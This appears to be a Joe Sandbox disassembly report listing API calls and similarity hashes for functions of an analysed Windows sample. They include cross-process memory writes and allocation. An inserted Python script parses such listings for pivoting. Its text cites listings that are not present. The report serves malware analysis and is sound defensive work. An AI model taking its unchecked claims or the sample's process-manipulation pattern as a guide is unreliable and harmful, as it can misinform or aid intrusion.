                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ForegroundPixelRelease
                                                                        • String ID:
                                                                        • API String ID: 4156661090-0
                                                                        • Opcode ID: 103b7a4f2a7fe83b356bef5bb1a6bf3809d2ad709907d0c1a3a3e390fdef78ba
                                                                        • Instruction ID: d3927c5f1c98f46bea4da0918cf040bb55dcac48c52962b89a35d175abb7c48d
                                                                        • Opcode Fuzzy Hash: 103b7a4f2a7fe83b356bef5bb1a6bf3809d2ad709907d0c1a3a3e390fdef78ba
                                                                        • Instruction Fuzzy Hash: 9D218475A00204AFD714EFA5CD45AAEBBF9FF88301F148479E959E7251DB70AC05CB50
                                                                        APIs
                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E8AFE3
                                                                        • SelectObject.GDI32(?,00000000), ref: 00E8AFF2
                                                                        • BeginPath.GDI32(?), ref: 00E8B009
                                                                        • SelectObject.GDI32(?,00000000), ref: 00E8B033
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                        • String ID:
                                                                        • API String ID: 3225163088-0
                                                                        • Opcode ID: 1b1d2085bead208d726aae0fab3e697231d303854a12c64e1b1088d2b66774d1
                                                                        • Instruction ID: 001fd101f9ef30f2a8b62262ff5f78128d37ccbf027ce9cbf18ca32cb91c4ecd
                                                                        • Opcode Fuzzy Hash: 1b1d2085bead208d726aae0fab3e697231d303854a12c64e1b1088d2b66774d1
                                                                        • Instruction Fuzzy Hash: 8821C57090034DEFDB11EF95ED497AA7B6AB750369F18532AF428B21A0C3705855EFA0
                                                                        APIs
                                                                        • __calloc_crt.LIBCMT ref: 00E921A9
                                                                        • CreateThread.KERNEL32(?,?,00E922DF,00000000,?,?), ref: 00E921ED
                                                                        • GetLastError.KERNEL32 ref: 00E921F7
                                                                        • _free.LIBCMT ref: 00E92200
                                                                        • __dosmaperr.LIBCMT ref: 00E9220B
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                        • String ID:
                                                                        • API String ID: 2664167353-0
                                                                        • Opcode ID: 18ae26b7dead094bda08f73b1b4fa3509a107f484d1d4d29ac59281e7afff515
                                                                        • Instruction ID: caa9a73f3c0a25553bdbea4d0d88f3e55106d0923e5b32def1f16fed08dc0a44
                                                                        • Opcode Fuzzy Hash: 18ae26b7dead094bda08f73b1b4fa3509a107f484d1d4d29ac59281e7afff515
                                                                        • Instruction Fuzzy Hash: DE114432109306BFDF10AFA5DC41DAB3BE9EF41774B10102DFA14B6092EB71C81196A0
                                                                        APIs
                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EAABD7
                                                                        • GetLastError.KERNEL32(?,00EAA69F,?,?,?), ref: 00EAABE1
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00EAA69F,?,?,?), ref: 00EAABF0
                                                                        • HeapAlloc.KERNEL32(00000000,?,00EAA69F,?,?,?), ref: 00EAABF7
                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EAAC0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 842720411-0
                                                                        • Opcode ID: 518a9954fc995d804bb2653729447621ea64cc424dd95fe400f913d6ed818f0f
                                                                        • Instruction ID: 7f33faa4474716b8c61a4eace33d621dc9134eb0161e51c56010b3b5863970e6
                                                                        • Opcode Fuzzy Hash: 518a9954fc995d804bb2653729447621ea64cc424dd95fe400f913d6ed818f0f
                                                                        • Instruction Fuzzy Hash: B0016970205204BFEB104FAADC48DBB7FAEEF8A3687140429F909E7260DB719C44CB61
                                                                        APIs
                                                                        • CLSIDFromProgID.OLE32 ref: 00EA9ADC
                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00EA9AF7
                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00EA9B05
                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00EA9B15
                                                                        • CLSIDFromString.OLE32(?,?), ref: 00EA9B21
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 3897988419-0
                                                                        • Opcode ID: dc711b55b50a96fb1523a2fb7f8aa8b3c9fb69aa492fde44454741e7fdcd8cfb
                                                                        • Instruction ID: 45bd04985aab8ee697d6d5af7e4e0728a7e4db0d5f17d5b53d40419972492764
                                                                        • Opcode Fuzzy Hash: dc711b55b50a96fb1523a2fb7f8aa8b3c9fb69aa492fde44454741e7fdcd8cfb
                                                                        • Instruction Fuzzy Hash: 46018F76600204BFDB144F55EC44BAA7EEEEF89392F244024F905F6211D770ED049BB0
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7A74
                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EB7A82
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7A8A
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EB7A94
                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7AD0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                        • String ID:
                                                                        • API String ID: 2833360925-0
                                                                        • Opcode ID: 58473ac1fb914adbc61e73349692caf418150f3d3ee578185f910bb19a8c9263
                                                                        • Instruction ID: 6686e85d7cfe814274ba8e9c8802bdb0001cfe472f603256652c9b3f749638a0
                                                                        • Opcode Fuzzy Hash: 58473ac1fb914adbc61e73349692caf418150f3d3ee578185f910bb19a8c9263
                                                                        • Instruction Fuzzy Hash: 97012531C0962DEBDF00AFE6DC48AEEBB79FB88711F001495E582B2650DB309654D7A1
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EAAADA
                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAAE4
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAAF3
                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAAFA
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAB10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: 99243f5029d3cd67d4b65c59b84bb5329888a533e335a1ea4aca05f700cf44e7
                                                                        • Instruction ID: 756bb9ddaabce42b5d15b0454c70ea87ebdce0d152fada60b7ec63cdc0297c59
                                                                        • Opcode Fuzzy Hash: 99243f5029d3cd67d4b65c59b84bb5329888a533e335a1ea4aca05f700cf44e7
                                                                        • Instruction Fuzzy Hash: 59F04F71205308AFEB110FA5EC88E773B6EFF8A758F04002AF941EB190CB60A805DA71
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EAAA79
                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EAAA83
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EAAA92
                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EAAA99
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EAAAAF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: 726d3c98e757c997aaa78a47b7e5e49b51a902b98be109d5d27d1898b40f0cd1
                                                                        • Instruction ID: 162b8fa6ef5611dbe2e28574ce445d4663bb75afb89510955cb22b13d757694c
                                                                        • Opcode Fuzzy Hash: 726d3c98e757c997aaa78a47b7e5e49b51a902b98be109d5d27d1898b40f0cd1
                                                                        • Instruction Fuzzy Hash: D9F0AF31205304AFEB111FA5AC88E773FAEFF8A798F040029F901EB190DB60AC05DB61
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00EAEC94
                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EAECAB
                                                                        • MessageBeep.USER32(00000000), ref: 00EAECC3
                                                                        • KillTimer.USER32(?,0000040A), ref: 00EAECDF
                                                                        • EndDialog.USER32(?,00000001), ref: 00EAECF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 3741023627-0
                                                                        • Opcode ID: fe2ec2f7f47f4f91f950831242963fb18ec77781df0e46f4f46b126dcfe747df
                                                                        • Instruction ID: 44586a6b7242c55726096d6a478d9e9be6e7fed4de27449ea3257312616fba1e
                                                                        • Opcode Fuzzy Hash: fe2ec2f7f47f4f91f950831242963fb18ec77781df0e46f4f46b126dcfe747df
                                                                        • Instruction Fuzzy Hash: 6D01D130500744EFEB246B11DE4EBA6BBB9FB44709F001559B582B91E1DBF0BA48CB40
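The per-function listings above (the WSOCK32 socket/connect helper, the GetPixel screen probe, and the two GetTokenInformation helpers that share API String ID 44706859-0) become much easier to pivot on once they are parsed into records rather than read by eye. The following Python is an added example written for this page; it is not Joe Sandbox code and does not use any Joe Sandbox API. It parses the listing format exactly as it appears here (the "APIs" / "Memory Dump Source" / "Similarity" sections with bulleted entries), tags each function by the modules it calls into, groups functions by API String ID, and scores two Instruction Fuzzy Hashes by positional nibble agreement. That score is this example's own heuristic, not Joe Sandbox's similarity metric; the MODULE_TAGS mapping is an assumption chosen for illustration. The sample input is three blocks copied from the listing above, with the Similarity section trimmed to the fields the example uses.

```python
"""Parse Joe Sandbox per-function API listings and pivot on them (added example, not
Joe Sandbox code; fuzzy_overlap() is this example's own heuristic, not Joe Sandbox's)."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

# One "• Api.MODULE(args), ref: ADDR" line; the optional prefix marks calls made inside a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Module -> coarse behaviour tag (assumed mapping); KERNEL32 and the CRT stay untagged as too generic.
MODULE_TAGS = {"WSOCK32": "network", "WS2_32": "network", "ADVAPI32": "token",
               "GDI32": "gdi", "USER32": "ui"}

# Sample input: three function blocks copied from the listing above (Similarity trimmed).
SAMPLE = """
APIs
  • Part of subcall function 00ECA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00ECA84E
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EC8BD3
• WSAGetLastError.WSOCK32(00000000), ref: 00EC8BE2
• connect.WSOCK32(00000000,?,00000010), ref: 00EC8BFE
Similarity
• API String ID: 3701255441-0
• Instruction Fuzzy Hash: 2B219F312041149FCB10AB68CE45FBEB7E9AF84714F04545DF946BB3D2CB70AC068751
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EAAADA
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAAE4
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAAF3
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAAFA
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EAAB10
Similarity
• API String ID: 44706859-0
• Instruction Fuzzy Hash: 59F04F71205308AFEB110FA5EC88E773B6EFF8A758F04002AF941EB190CB60A805DA71
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EAAA79
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EAAA83
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EAAA92
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EAAA99
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EAAAAF
Similarity
• API String ID: 44706859-0
• Instruction Fuzzy Hash: D9F0AF31205304AFEB111FA5AC88E773FAEFF8A798F040029F901EB190DB60AC05DB61
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    subcall: str | None  # callee address when the call is reported from a subfunction

@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

def parse_blocks(text: str) -> list[FunctionBlock]:
    """Each 'APIs' header opens a new function; bullets are API calls or key/value fields."""
    blocks: list[FunctionBlock] = []
    section = None
    for line in (raw.strip() for raw in text.splitlines()):
        if line in SECTIONS:
            section = line
            if section == "APIs":
                blocks.append(FunctionBlock())
        elif line.startswith("•") and blocks:
            m = (API_RE if section == "APIs" else FIELD_RE).match(line.lstrip("• "))
            if m is None:
                continue  # tolerate extraction noise instead of aborting the whole report
            if section == "APIs":
                blocks[-1].apis.append(ApiCall(m["name"], m["module"], m["args"] or "",
                                               m["ref"].upper(), m["sub"]))
            else:
                blocks[-1].fields.setdefault(m["key"], m["val"])  # first value wins
    return blocks

def tags(block: FunctionBlock) -> set[str]:
    """Coarse behaviour tags from the modules a function calls into."""
    return {MODULE_TAGS[c.module] for c in block.apis if c.module in MODULE_TAGS}

def by_api_string_id(blocks: list[FunctionBlock]) -> dict[str, list[FunctionBlock]]:
    """Functions sharing an API String ID are candidates for the same helper or template."""
    groups: dict[str, list[FunctionBlock]] = defaultdict(list)
    for b in blocks:
        groups[b.fields.get("API String ID", "")].append(b)
    return groups

def fuzzy_overlap(h1: str, h2: str) -> tuple[int, int]:
    """(matching nibbles, total) by position; only meaningful for equal-length hashes."""
    if len(h1) != len(h2):
        raise ValueError("fuzzy hashes differ in length; positional comparison is meaningless")
    return sum(a == b for a, b in zip(h1, h2)), len(h1)

if __name__ == "__main__":
    twins = by_api_string_id(parse_blocks(SAMPLE))["44706859-0"]
    print("nibble overlap of the two token helpers: %d/%d" % fuzzy_overlap(*(t.fields["Instruction Fuzzy Hash"] for t in twins)))
```

Run against the excerpt, the two GetTokenInformation helpers agree in 55 of 70 nibble positions, which is what the listing already suggests: both use the same query-size, allocate, query-again idiom and differ mainly in the TOKEN_INFORMATION_CLASS argument. Joe Sandbox emits fuzzy hashes of different lengths for functions of different size, so the length check is deliberate: comparing hashes of unequal length position by position would produce a meaningless number rather than a signal.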
                                                                        APIs
                                                                        • EndPath.GDI32(?), ref: 00E8B0BA
                                                                        • StrokeAndFillPath.GDI32(?,?,00EEE680,00000000,?,?,?), ref: 00E8B0D6
                                                                        • SelectObject.GDI32(?,00000000), ref: 00E8B0E9
                                                                        • DeleteObject.GDI32 ref: 00E8B0FC
                                                                        • StrokePath.GDI32(?), ref: 00E8B117
                                                                        Similarity
                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                        • String ID:
                                                                        • API String ID: 2625713937-0
                                                                        • Opcode ID: 6efddfad35ab56902fb391ea17aebb9b191b3aafc4b8bc73296640b088b9066d
                                                                        • Instruction ID: b9f8a2db95a84ffa38ba53e3efbd5cc11adc84becdf70ee3fd05de79d8d2dd03
                                                                        • Opcode Fuzzy Hash: 6efddfad35ab56902fb391ea17aebb9b191b3aafc4b8bc73296640b088b9066d
                                                                        • Instruction Fuzzy Hash: 61F0B630005648EFDB22AFA6ED0E7A53F66B751376F089315E429691F0CB318969EF60
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 00EBF2DA
                                                                        • CoCreateInstance.OLE32(00EFDA7C,00000000,00000001,00EFD8EC,?), ref: 00EBF2F2
                                                                        • CoUninitialize.OLE32 ref: 00EBF555
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                        • String ID: .lnk
                                                                        • API String ID: 948891078-24824748
                                                                        • Opcode ID: 1e39683e69589e42222bd36af6ee8dcb87a20f21ed6292c6bae4e2ed0106a192
                                                                        • Instruction ID: 23b4d7c27d3eedb51e508d5623606425844f72b9d380e328aea673048a4c0025
                                                                        • Opcode Fuzzy Hash: 1e39683e69589e42222bd36af6ee8dcb87a20f21ed6292c6bae4e2ed0106a192
                                                                        • Instruction Fuzzy Hash: BDA11971104201AFD301EF64CC81EABB7ECEF99714F00995DF659A71A2EB70EA09CB52
                                                                        APIs
                                                                          • Part of subcall function 00E7660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E753B1,?,?,00E761FF,?,00000000,00000001,00000000), ref: 00E7662F
                                                                        • CoInitialize.OLE32(00000000), ref: 00EBE85D
                                                                        • CoCreateInstance.OLE32(00EFDA7C,00000000,00000001,00EFD8EC,?), ref: 00EBE876
                                                                        • CoUninitialize.OLE32 ref: 00EBE893
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                        • String ID: .lnk
                                                                        • API String ID: 2126378814-24824748
                                                                        • Opcode ID: 95cd09b6fd57c9717a87954b24a2532d59180630f08ef444e29a47732a680c1a
                                                                        • Instruction ID: b57e0d6c0a6d193f390d52fcc32440a30a8cf714647ceb79ba9505674449ff52
                                                                        • Opcode Fuzzy Hash: 95cd09b6fd57c9717a87954b24a2532d59180630f08ef444e29a47732a680c1a
                                                                        • Instruction Fuzzy Hash: 6DA136756043019FCB14DF14C8849AEBBE5FF89314F148998F99AAB3A2CB31ED45CB91
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00E932ED
                                                                          • Part of subcall function 00E9E0D0: __87except.LIBCMT ref: 00E9E10B
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ErrorHandling__87except__start
                                                                        • String ID: pow
                                                                        • API String ID: 2905807303-2276729525
                                                                        • Opcode ID: f2eafc72342c1ea7d99b38abdd261fab323d0872d5c50e2a75708f5389ce9fea
                                                                        • Instruction ID: 43a742eb1c39c19ce69a48bdd806c73910bf49f1216eb8f464131314ed5f4845
                                                                        • Opcode Fuzzy Hash: f2eafc72342c1ea7d99b38abdd261fab323d0872d5c50e2a75708f5389ce9fea
                                                                        • Instruction Fuzzy Hash: 86517931A0920596CF11F724C9413BE3BD4AB40718F20BD69F5E5A23F9EF348DC8AA42
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00F0DC50,?,0000000F,0000000C,00000016,00F0DC50,?), ref: 00EB4645
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00EB46C5
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                                        • String ID: REMOVE$THIS
                                                                        • API String ID: 3797816924-776492005
                                                                        • Opcode ID: 620c79b3153232b703f2946454f7d4e1f3e0904c42a2fd680256f6047ddfa04e
                                                                        • Instruction ID: 3c6960927a804b56c8396b46661b7f952e3ca55e832a75c199e0dc64c3ca7d24
                                                                        • Opcode Fuzzy Hash: 620c79b3153232b703f2946454f7d4e1f3e0904c42a2fd680256f6047ddfa04e
                                                                        • Instruction Fuzzy Hash: 1C415DB4A002199FCF01EF64C881AEEB7F5FF49304F149469E91ABB2A2DB349D45CB50
                                                                        APIs
                                                                          • Part of subcall function 00EB430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EABC08,?,?,00000034,00000800,?,00000034), ref: 00EB4335
                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EAC1D3
                                                                          • Part of subcall function 00EB42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EABC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00EB4300
                                                                          • Part of subcall function 00EB422F: GetWindowThreadProcessId.USER32(?,?), ref: 00EB425A
                                                                          • Part of subcall function 00EB422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EABBCC,00000034,?,?,00001004,00000000,00000000), ref: 00EB426A
                                                                          • Part of subcall function 00EB422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EABBCC,00000034,?,?,00001004,00000000,00000000), ref: 00EB4280
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EAC240
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EAC28D
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                        • String ID: @
                                                                        • API String ID: 4150878124-2766056989
                                                                        • Opcode ID: 9fe0a7f669977d609ec96a0f6a551592eafc4f1fce8a0f0dd895b70ab507b2c0
                                                                        • Instruction ID: 7ab5560a0397ecffa2f663c40ff39924ac294cd44cd5fb23c731e014692ce4cd
                                                                        • Opcode Fuzzy Hash: 9fe0a7f669977d609ec96a0f6a551592eafc4f1fce8a0f0dd895b70ab507b2c0
                                                                        • Instruction Fuzzy Hash: 0E415BB2900218AFDB11DFA4CD81BEEBBB8EF09300F104095FA45BB191DA716E45DB61
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F0DC00,00000000,?,?,?,?), ref: 00EDA6D8
                                                                        • GetWindowLongW.USER32 ref: 00EDA6F5
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EDA705
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Window$Long
                                                                        • String ID: SysTreeView32
                                                                        • API String ID: 847901565-1698111956
                                                                        • Opcode ID: f226e0bb2e648a1c5db834926d7e0a4fa44216b076559aa0618015b59f1fc94f
                                                                        • Instruction ID: 7b997cdf3e35f86581e8017cd5943ecbbad0c677b60ed9aed10d787af3e492a8
                                                                        • Opcode Fuzzy Hash: f226e0bb2e648a1c5db834926d7e0a4fa44216b076559aa0618015b59f1fc94f
                                                                        • Instruction Fuzzy Hash: 5431CE31100205AFDB119E78CC41BEA7BA9FB49338F285726F879A32E0C770E9519B51
                                                                        APIs
